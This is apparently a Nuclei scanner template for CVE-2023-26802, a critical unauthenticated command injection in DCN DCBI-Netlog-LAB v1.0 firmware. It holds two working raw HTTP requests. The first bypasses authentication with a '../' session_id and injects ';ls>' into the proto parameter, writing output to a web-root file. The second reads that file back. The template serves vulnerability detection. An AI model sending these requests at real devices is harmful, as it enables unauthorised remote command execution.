id: CVE-2023-26802

info:
  name: DCBI-Netlog-LAB v1.0 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.
  impact: |
    Unauthenticated attackers can bypass authentication and execute arbitrary OS commands on the DCN DCBI-Netlog-LAB device, leading to complete device compromise and potential network infiltration.
  remediation: |
    Upgrade to the latest firmware version from DCN that addresses this command injection vulnerability, or apply vendor-provided security patches.
  reference:
    - https://web.archive.org/web/20230605051153/https://github.com/winmt/my-vuls/tree/main/DCN%20DCBI-Netlog-LAB
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-26802
    cwe-id: CWE-22
    epss-score: 0.4871
    epss-percentile: 0.98723
    cpe: cpe:2.3:o:dcnglobal:dcbi-netlog-lab_firmware:1.0:*:*:*:*:*:*:*
  metadata:
    vendor: dcnglobal
    product: dcbi-netlog-lab_firmware
  tags: cve,cve2023,rce,unauth,netlog,vkev,vuln

variables:
  file_name: "{{rand_text_alpha(4)}}.html"

http:
  - raw:
      - |
        GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/{{file_name}}; HTTP/1.1
        Host: {{Hostname}}
        DNT: 1
        X-Forwarded-For: 8.8.8.8

      - |
        GET /{{file_name}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        DNT: 1
        X-Forwarded-For: 8.8.8.8

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "nsg_bridge.cgi"
          - "nsg_dhcpactiveip.cgi"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402202eddb61d3693ca802572fe4814fb0d5d68336063d79985982d8ab30fcee6e56902202d26cc1e481f2676d67683b56e96d40caed0a5204f576f0999270eba4f5bdda0:922c64590222798bb761d5b6d8e72950